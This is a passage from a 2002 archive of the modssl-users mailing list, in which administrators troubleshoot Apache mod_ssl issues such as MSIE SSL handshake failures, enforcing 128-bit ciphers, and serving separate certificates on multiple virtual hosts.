on one of the machines in my office so I can repeatedly create the errors. I am determined to squash this thing but I do not know where to go next. I have included the following information below: * SYSTEM INFORMATION * CONFIGURATION INFORMATION * BROWSER VERSION INFORMATION * CERTIFICATE STATISTICS FROM THE BROWSER Any help or further direction would be greatly appreciated! Sincerely, Christopher Taranto SYSTEM INFORMATION: =================== I am running Red Hat 6.2 on a Pentinum III using: * mod_ssl-2.8.5-1.3.22 * openssl-0.9.6b * mm-1.1.3 CONFIGURATION INFORMATION: ========================== AddType application/x-x509-ca-cert .crt AddType application/x-pkcs7-crl .crl SSLPassPhraseDialog builtin # I have also tried dbm but there was no difference SSLSessionCache shm:/usr/local/apache/logs/ssl_gcache_data(512000) SSLSessionCacheTimeout 300 SSLMutex file:logs/ssl_mutex SSLRandomSeed startup builtin SSLRandomSeed connect builtin SSLLog logs/ssl_engine_log SSLLogLevel info SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP BrowserMatch "MSIE [1-4]" nokeepalive \ ssl-unclean-shutdown \ downgrade-1.0 \ force-response-1.0 BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown BrowserMatch "Mozilla/4..*PC)" nokeepalive \ downgrade-1.0 \ force-response-1.0 BROWSER VERSION INFORMATION =================================== MSIE 5.00.2614.3500 Cipher Strength: 40-bit CERTIFICATE STATS FROM THE BROWSER =================================== My certificate was generated using 1024 bits. Version: V3 Serial Number: 5A55 3FAD EB43 6649 7F8B 39BB 1D33 6DE1 Signature Algorithm: md5RSA Public Key: 3081 8902 8181 00BD D63A 500D 0FE0 CCA2 E7BB 804B 53DA E4CE 9F51 3D54 93A3 5D2E FC0E E3E2 7046 1EFF 6826 BB30 B8DC 4903 9A32 345F E769 31D7 D313 6ECD 62BD 2CBE C070 AFD5 C1C8 9920 7442 5E44 2AED 7878 A566 DD3A 3445 0612 919A 0B74 2F6A E806 080F C7E7 9C68 7FAC 51D3 4EA9 0BC3 ABAF 27D2 2C95 0A09 CD12 61B3 4DF2 0A88 1379 7552 5B1C D4CE 9F02 0301 0001 Basic Constraints: Subject Type=End Entity Path Length Constraint=None Key Usage: Digital Signature, Key Encipherment(A0) [1]CRL Distribution Point Distribution Point Name: Full Name: URL=http://crl.verisign.com/RSASecureServer.crl [1]Certificate Policy: PolicyIdentifier=2.16.840.1.113733.1.7.1.1 [1,1]Policy Qualifier Info: Policy Qualifier Id=1.3.6.1.5.5.7.2.1 Qualifier=161C 6874 7470 733A 2F2F 7777 772E 7665 7269 7369 676E 2E63 6F6D 2F43 5053 [1,2]Policy Qualifier Info: Policy Qualifier Id=1.3.6.1.5.5.7.2.2 Qualifier=3056 3015 160E 5665 7269 5369 676E 2C20 496E 632E 3003 0201 011A 3D56 6572 6953 6967 6E27 7320 4350 5320 696E 636F 7270 2E20 6279 2072 6566 6572 656E 6365 206C 6961 622E 206C 7464 2E20 2863 2939 3720 5665 7269 5369 676E Server Authentication(1.3.6.1.5.5.7.3.1) Client Authentication(1.3.6.1.5.5.7.3.2) 2.16.840.1.113733.1.6.15: 16 09 39 32 36 30 32 32 ..926022 34 32 37 427 Authority Information Access: [1]Authority Info Access AccessMethod=On-line Certificate Status Protocol(1.3.6.1.5.5.7.48.1) Alternative Name: URL=http://ocsp.verisign.com Thumbprint Algorithm: sha1 Thumbprint: CC1C DD7D BE05 C813 F119 813B 86E6 5717 5583 F981 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 09:52:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA12157; Fri, 18 Jan 2002 09:51:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mail.gmx.net id JAA12128; Fri, 18 Jan 2002 09:50:09 +0100 (MET) Received: (qmail 12225 invoked by uid 0); 18 Jan 2002 08:50:05 -0000 Received: from unknown (HELO gmx.at) (195.248.40.88) by mail.gmx.net (mp008-rz3) with SMTP; 18 Jan 2002 08:50:05 -0000 Message-ID: <3C47E1F0.E893B8EA@gmx.at> Date: Fri, 18 Jan 2002 09:50:56 +0100 From: Christian Hekerens X-Mailer: Mozilla 4.78 [en] (X11; U; SunOS 5.6 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: ensure 128 bit encryption Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christian Hekerens X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi! i want do ensure that all users have at least 128 bit encryption on all of my sites. this is necessary because of the users can bookmark a page. so i have no entry page with an cgi-script where i can read the HTTPS_SECRETKEYSIZE environment variable. i tried it with mod_rewrite, but there i also can't access HTTPS_SECRETKEYSIZE. i can't turn off weak ciphers, because then no connection is possible. what i want is, that users with i.e. 56 bit encryption (browser) are forwarded to an error page (can be unsecure). i hope anyone can help me, thanx chris ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 10:37:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA14308; Fri, 18 Jan 2002 10:36:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA14268; Fri, 18 Jan 2002 10:35:34 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA15221 for ; Fri, 18 Jan 2002 10:35:28 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma015203; Fri, 18 Jan 02 10:35:27 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA28268 for ; Fri, 18 Jan 2002 10:35:26 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA19855 for ; Fri, 18 Jan 2002 10:35:24 +0100 (MET) Message-ID: <3C47EC5C.1CE624A3@bourse.ch> Date: Fri, 18 Jan 2002 10:35:24 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Multiple SSL-enabled vhosts References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Joe Auty wrote: > I want to have 2 different certificates used in 2 different virtual > hosts on my server. > > I have: > > "SSLCertificateFile /etc/httpd/conf/ssl.crt/cert1.crt" specified > for one virtualhost, and: > > "SSLCertificateFile /etc/httpd/conf/ssl.crt/cert2.crt" specified for the > other. > > The problem is that other/second vhost is using cert1.crt for some reason. > When I do a "openssl x509 -noout -text -in cert2.crt" I get the correct > information for that certificate which is, of course, different than > cert1. > > Is there a way to specify multiple SSLCertificateFile directives for > different vhosts, or will the first one specified be used unconditionally > for all other vhosts? Hate to have to tell you but it can't be done. You cannot have more than one SSL VH on any given IP address/Port. To have more than one SSL VH on the same machine, they have to use different IP addresses or different ports - name-based VHs don't work. See http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47 and http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2 for why... Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 15:57:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA29860; Fri, 18 Jan 2002 15:56:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.texas-shooters.com id PAA29846; Fri, 18 Jan 2002 15:55:44 +0100 (MET) Received: from mail.texas-shooters.com (localhost [127.0.0.1]) by mail.texas-shooters.com (8.12.1/8.12.1) with ESMTP id g0HNVbEk077115 for ; Thu, 17 Jan 2002 17:31:37 -0600 (CST)?g (envelope-from el_kab0ng@mail.texas-shooters.com) Received: (from el_kab0ng@localhost) by mail.texas-shooters.com (8.12.1/8.12.1/Submit) id g0HNVagk077114 for modssl-users@modssl.org; Thu, 17 Jan 2002 17:31:36 -0600 (CST)?g (envelope-from el_kab0ng) Date: Thu, 17 Jan 2002 17:31:36 -0600 From: pr0ject To: modssl-users@modssl.org Subject: Apache + mod_ssl bug? Message-ID: <20020117173136.A76952@mail.texas-shooters.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-righteous-weapon: AK-47, of course. X-planation: Happiness is a warm gun. X-bitch: I miss my ex-wife... but with this new laser sight... X-website: http://www.texas-shooters.com Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: pr0ject X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I recently installed Apache 1.3.22 + mod_ssl to give my users SSL capabilities... Unfortunately by doing so, it broke the /~user web space. I went back, reconfigured like it should be (uncommented the basic Directory container for the public_html options..) Restarted apachessl with no errors. Yet, when viewing the userspace, I get a forbidden error. The logs tell me the following: [Thu Jan 17 17:37:23 2002] [error] [client] Symbolic link not allowed: /home/ The ONLY fix I have found for this so far (have been testing variations of the conf file all day!!) has been to allow the top level directory to have the Options FollowSymLinks. My platform is FreeBSD 4.4-Release with Apache+mod_ssl+php... since FreeBSD symlinks /usr/home to /home, I assume this is where the problems begin. FYI: I have explicitly assigned the user directory container to /usr/home/*/ public_html with the same error occuring. Is this an Apache issue? Or maybe an SSL/Apache issue? Anyone ever have this problem? I'm at a loss at this point.... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 15:57:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA29878; Fri, 18 Jan 2002 15:56:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.texas-shooters.com id PAA29845; Fri, 18 Jan 2002 15:55:43 +0100 (MET) Received: from mail.texas-shooters.com (localhost [127.0.0.1]) by mail.texas-shooters.com (8.12.1/8.12.1) with ESMTP id g0IDT1Ek098857 for ; Fri, 18 Jan 2002 07:29:01 -0600 (CST)?g (envelope-from el_kab0ng@mail.texas-shooters.com) Received: (from el_kab0ng@localhost) by mail.texas-shooters.com (8.12.1/8.12.1/Submit) id g0IDT0P4098848 for modssl-users@modssl.org; Fri, 18 Jan 2002 07:29:00 -0600 (CST)?g (envelope-from el_kab0ng) Date: Fri, 18 Jan 2002 07:29:00 -0600 From: pr0ject To: modssl-users@modssl.org Subject: Possible Apache+mod_ssl bug? Message-ID: <20020118072900.A98755@mail.texas-shooters.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-righteous-weapon: AK-47, of course. X-planation: Happiness is a warm gun. X-bitch: I miss my ex-wife... but with this new laser sight... X-website: http://www.texas-shooters.com Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: pr0ject X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I recently installed Apache 1.3.22 + mod_ssl to give my users SSL capabilities... Unfortunately by doing so, it broke the /~user web space. I went back, reconfigured like it should be (uncommented the basic Directory container for the public_html options..) Restarted apachessl with no errors. Yet, when viewing the userspace, I get a forbidden error. The logs tell me the following: [Thu Jan 17 17:37:23 2002] [error] [client] Symbolic link not allowed: /home/ The ONLY fix I have found for this so far (have been testing variations of the conf file all day!!) has been to allow the top level directory to have the Options FollowSymLinks. My platform is FreeBSD 4.4-Release with Apache+mod_ssl+php... since FreeBSD symlinks /usr/home to /home, I assume this is where the problems begin. FYI: I have explicitly assigned the user directory container to /usr/home/*/ public_html with the same error occuring. Is this an Apache issue? Or maybe an SSL/Apache issue? Anyone ever have this problem? I'm at a loss at this point.... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 16:46:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA01928; Fri, 18 Jan 2002 16:45:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.ecomserver.com id QAA01884; Fri, 18 Jan 2002 16:44:43 +0100 (MET) Received: from mail.ecomserver.com ([127.0.0.1]) by mail.ecomserver.com (Netscape Messaging Server 4.15) with ESMTP id GQ55M900.FUC for ; Fri, 18 Jan 2002 10:56:33 -0500 From: "Rajidhar Etta" To: modssl-users@modssl.org Message-ID: Date: Fri, 18 Jan 2002 10:56:33 -0500 X-Mailer: Netscape Webmail MIME-Version: 1.0 Content-Language: en Subject: Re: ensure 128 bit encryption X-Accept-Language: en Content-Type: multipart/mixed; boundary="--50ea1f47e6750b" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Rajidhar Etta" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ----50ea1f47e6750b Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: 7bit Use the following in either OR configuration directives, SSLRequireSSL SSLRequire ( %{SSL_CIPHER_USEKEYSIZE} >= 128 ) Thanks, Rajidhar Etta ----- Original Message ----- From: Christian Hekerens Date: Friday, January 18, 2002 3:50 am Subject: ensure 128 bit encryption > hi! > > i want do ensure that all users have at least 128 bit encryption > on all > of > my sites. this is necessary because of the users can bookmark a > page. so > i > have no entry page with an cgi-script where i can read the > HTTPS_SECRETKEYSIZE > environment variable. i tried it with mod_rewrite, but there i also > can't > access HTTPS_SECRETKEYSIZE. > i can't turn off weak ciphers, because then no connection is possible. > what i > want is, that users with i.e. 56 bit encryption (browser) are > forwardedto > an error page (can be unsecure). > > i hope anyone can help me, thanx > > chris > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ----50ea1f47e6750b Content-Type: text/x-vcard; name="retta.vcf"; charset=us-ascii Content-Disposition: attachment; filename="retta.vc" Content-Description: Card for Rajidhar Etta Content-Transfer-Encoding: 7bit begin:vcard n:Etta;Rajidhar fn:Rajidhar Etta tel;cell:609.203.3697 tel;fax:(888) 979-8800 tel;home:(609) 750-0836 tel;work:(609) 951-8500 x192 org:eComServer Inc;ACB adr:;;Princeton Executive Campus, 4301, Route 1, South Suite 220,;Monmouth Junction;NJ;08852;United States of America version:2.1 email;internet:retta@ecomserver.com title:Software Engineer end:vcard ----50ea1f47e6750b-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 17:26:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA03817; Fri, 18 Jan 2002 17:25:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chrome.verticalscope.com id RAA03791; Fri, 18 Jan 2002 17:25:03 +0100 (MET) Received: from jedi.verticalscope.com (dhcp116.office.verticalscope.com [10.10.10.116]) by chrome.verticalscope.com (Postfix) with ESMTP id D914DCC929 for ; Fri, 18 Jan 2002 11:29:39 -0500 (EST) Received: by jedi.verticalscope.com (Postfix, from userid 533) id 7D35719B4; Fri, 18 Jan 2002 11:24:56 -0500 (EST) Message-ID: X-Mailer: XFMail 1.5.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <4.3.2.7.2.20020117203440.033d3c00@130.94.22.245> X-Base: are belong to us. move zig for great justice. Date: Fri, 18 Jan 2002 11:24:56 -0500 (EST) X-Face: %*.F!K#`0&;M^0AiDH.>-twy^j2[V{11:%R@6A~sj26H$^}7B[ez9tB`&D'j-?}eX%;o|YO zn1jl&;})pyN.}i.gv~S>>u%=={3PJMI3.pcaQ0l#E.S0(xHJKhmW#]CMP}ue"&PsW=q&Tl8C&g)AT ;<9dD2"Z|$El To: modssl-users@modssl.org Subject: RE: MSIE + "The page cannot be displayed" error Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am wondering if someone is keeping a list of working versus non-working versions of IE, and if not, whether one could be started. I am running into this issue as well, and my support department keeps harrassing me to come up with better solutions to tell the users other than "Use Netscape". Thank you Christopher for providing a non-working version number; does anyone know of a version # of IE which does work reliably? - Julian On 18-Jan-2002 Christopher Taranto wrote: > Fortunately (for my sanity), I have one of non-working versions of the MSIE > browsers (5.00.2614.3500) on one of the machines in my office so I can > repeatedly create the errors. -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 17:45:54 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA04559; Fri, 18 Jan 2002 17:44:52 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chrome.verticalscope.com id RAA04505; Fri, 18 Jan 2002 17:43:31 +0100 (MET) Received: from jedi.verticalscope.com (dhcp116.office.verticalscope.com [10.10.10.116]) by chrome.verticalscope.com (Postfix) with ESMTP id 8BF95CC9D6 for ; Fri, 18 Jan 2002 11:48:08 -0500 (EST) Received: by jedi.verticalscope.com (Postfix, from userid 533) id 87CFA19B4; Fri, 18 Jan 2002 11:43:25 -0500 (EST) Message-ID: X-Mailer: XFMail 1.5.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <3C47EC5C.1CE624A3@bourse.ch> X-Base: are belong to us. move zig for great justice. Date: Fri, 18 Jan 2002 11:43:25 -0500 (EST) X-Face: %*.F!K#`0&;M^0AiDH.>-twy^j2[V{11:%R@6A~sj26H$^}7B[ez9tB`&D'j-?}eX%;o|YO zn1jl&;})pyN.}i.gv~S>>u%=={3PJMI3.pcaQ0l#E.S0(xHJKhmW#]CMP}ue"&PsW=q&Tl8C&g)AT ;<9dD2"Z|$El To: modssl-users@modssl.org Subject: Re: Multiple SSL-enabled vhosts Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 18-Jan-2002 Owen Boyle wrote: >> I want to have 2 different certificates used in 2 different virtual >> hosts on my server. >> Is there a way to specify multiple SSLCertificateFile directives for >> different vhosts, or will the first one specified be used unconditionally >> for all other vhosts? > > Hate to have to tell you but it can't be done. You cannot have more than > one SSL VH on any given IP address/Port. To have more than one SSL VH on > the same machine, they have to use different IP addresses or different > ports - name-based VHs don't work. I don't think that's what the original person was asking: he was asking if he could use two different certificates on two different virtual hosts, which might not, actually, MUST not be on the same IP. The answer is yes, it is possible... I am doing it here. But you have to make sure you are using the correct key file that corresponds to the right certificate, e.g. SSLCertificateKeyFile /some/key/file SSLCertificateFile /some/cert/file . . SSLCertificateKeyFile /some/other/key/file SSLCertificateFile /some/other/cert/file . . . - Julian -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 17:46:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA04601; Fri, 18 Jan 2002 17:45:47 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from netmusician.org id RAA04563; Fri, 18 Jan 2002 17:44:56 +0100 (MET) Received: from localhost (joe@localhost) by netmusician.org (8.11.2/8.11.0) with ESMTP id g0IGlhK05475 for ; Fri, 18 Jan 2002 11:47:43 -0500 Date: Fri, 18 Jan 2002 11:47:42 -0500 (EST) From: Joe Auty To: Subject: Re: Multiple SSL-enabled vhosts In-Reply-To: <3C47EC5C.1CE624A3@bourse.ch> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Auty X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Hate to have to tell you but it can't be done. You cannot have more than > one SSL VH on any given IP address/Port. To have more than one SSL VH on > the same machine, they have to use different IP addresses or different > ports - name-based VHs don't work. > I see.... Have you ever setup more than one SSL VH using more than one IP on the same machine and gotten this to work? I've set my DNS to point to cert2 with an IP address ending in '.115', and cert1 ends with '.114'. My virtual hosts in httpd.conf are setup as following: Pathtocert1 Servername server.com Pathtocert2 Servername joe.server.com The results are, again, going to joe.server.com gives the same certificate as just going to server.com. Of course, I have two IP addresses designated to the same machine (.114 and .115). Am I on the right track? -- Joe Auty joe@netmusician.org http://www.netmusician.org http://www.jeahost.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 17:59:32 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA05232; Fri, 18 Jan 2002 17:58:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id RAA05198; Fri, 18 Jan 2002 17:57:25 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id RAA25968 for ; Fri, 18 Jan 2002 17:57:19 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma025894; Fri, 18 Jan 02 17:57:09 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id RAA22820 for ; Fri, 18 Jan 2002 17:57:08 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id RAA24903 for ; Fri, 18 Jan 2002 17:56:45 +0100 (MET) Message-ID: <3C4853C5.7B1FF704@bourse.ch> Date: Fri, 18 Jan 2002 17:56:37 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Multiple SSL-enabled vhosts References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Joe Auty wrote: > > > Hate to have to tell you but it can't be done. You cannot have more than > > one SSL VH on any given IP address/Port. To have more than one SSL VH on > > the same machine, they have to use different IP addresses or different > > ports - name-based VHs don't work. > > > > I see.... > > Have you ever setup more than one SSL VH using more than one IP on the > same machine and gotten this to work? > > I've set my DNS to point to cert2 with an IP address ending in '.115', and > cert1 ends with '.114'. > > My virtual hosts in httpd.conf are setup as following: > > > Pathtocert1 > Servername server.com > > > > Pathtocert2 > Servername joe.server.com > > > The results are, again, going to joe.server.com gives the same certificate > as just going to server.com. Of course, I have two IP addresses designated > to the same machine (.114 and .115). > > Am I on the right track? Kind of - you don't need to define SServerName since the IP address does the defining. You get the selection in the browser - i.e. https://ip.114/ and http://ip.115/ should go to the different hosts... Rgds, Owen. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 18:51:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA08860; Fri, 18 Jan 2002 18:50:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from netmusician.org id SAA08825; Fri, 18 Jan 2002 18:49:36 +0100 (MET) Received: from localhost (joe@localhost) by netmusician.org (8.11.2/8.11.0) with ESMTP id g0IHqL805818 for ; Fri, 18 Jan 2002 12:52:21 -0500 Date: Fri, 18 Jan 2002 12:52:21 -0500 (EST) From: Joe Auty To: Subject: Re: Multiple SSL-enabled vhosts In-Reply-To: <3C4853C5.7B1FF704@bourse.ch> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joe Auty X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Fri, 18 Jan 2002, Owen Boyle wrote: > > My virtual hosts in httpd.conf are setup as following: > > > > > > Pathtocert1 > > Servername server.com > > > > > > > > Pathtocert2 > > Servername joe.server.com > > > > > > The results are, again, going to joe.server.com gives the same certificate > > as just going to server.com. Of course, I have two IP addresses designated > > to the same machine (.114 and .115). > > > > Am I on the right track? > > Kind of - you don't need to define SServerName since the IP address does > the defining. You get the selection in the browser - i.e. > https://ip.114/ and http://ip.115/ should go to the different hosts... > You mean the browser takes the domain name from the browser, does a DNS lookup, and equates this to the IP, and because the IPs are differnet in my example, the Servername is not necessary? What if I wanted to setup something like the following: pathtocert1 Servername joe.com DocumentRoot /home/joe pathtocert1 Servername auty.com DocumentRoot /home/auty Because the IP is now ambigious, I'm assuming the Servername is required unless I used the NameVirtualHost * convention (which I haven't really gotten working with SSL in my brief attempts)? This (the above) seems to work as expected, although when I do a apachectl startssl I get an error message about the one taking precident over the other... the error message doesn't seem to affect any usage, it seems to work fine. Am I right? If not, is there a way to get around the error? -- Joe Auty joe@netmusician.org http://www.netmusician.org http://www.jeahost.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Jan 18 18:54:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA08992; Fri, 18 Jan 2002 18:53:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from server.cartmanager.net id SAA08944; Fri, 18 Jan 2002 18:52:23 +0100 (MET) Received: from Jason (dhcp120.cartmanager.net [207.173.85.120]) by server.cartmanager.net (8.11.6/8.11.6) with ESMTP id g0IHmXh26308 for ; Fri, 18 Jan 2002 10:48:33 -0700 Message-ID: <039801c1a048$e10dc4f0$7855adcf@Jason> From: "Jason" To: References: <4.3.2.7.2.20020117203440.033d3c00@130.94.22.245> Subject: Re: MSIE + "The page cannot be displayed" error Date: Fri, 18 Jan 2002 10:51:29 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jason" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Run this command line and try to connect to it. openssl s_server -accept 4443 -www -cert pathtocert -key pathtokey -state 1) Make sure to change "pathtocert" and "pathtokey" to the appropriate values, and for additional debug info add -debug... 2) Try to make sure you are using the same openssl that you compiled apache with It simply creates a weblike version of SSL on port 4433 WITHOUT apache that will print some debug info to the client.... feel free to "man s_server" to get info about the program At least this way, you will be able to find out if the problem is with SSL, or if it with (mod_ssl+apache) PS... please let me know as I am confronted with the EXACT problem you have, and have been for 3 years... even after a full Linux redhat upgrade to 7.2 (complete reformat, re-install) To date, I haven't found a machine that is afflicted with the problem that I can do this with :( ----- Original Message ----- From: "Christopher Taranto" To: Sent: Thursday, January 17, 2002 11:10 PM Subject: RE: MSIE + "The page cannot be displayed" error > Hi, > > I have been trying to fix the known MSIE browser issues in my configuration > with some issues still occuring. > > I have read the FAQ, searched the archives, and implemented the solutions > that have been documented - but I am still getting the dreaded "The page > cannot be displayed" error when certain MSIE browsers attempt to connect to > my site. I get the infamous log entry: > > [Fri Jan 18 00:55:53 2002] [error] mod_ssl: SSL handshake interrupted by > system [Hint: Stop button pressed in browser?!] (System error follows) > [Fri Jan 18 00:55:53 2002] [error] System: Connection reset by peer > (errno: 104) > > Fortunately (for my sanity), I have one of non-working versions of the MSIE > browsers (5.00.2614.3500) on one of the machines in my office so I can > repeatedly 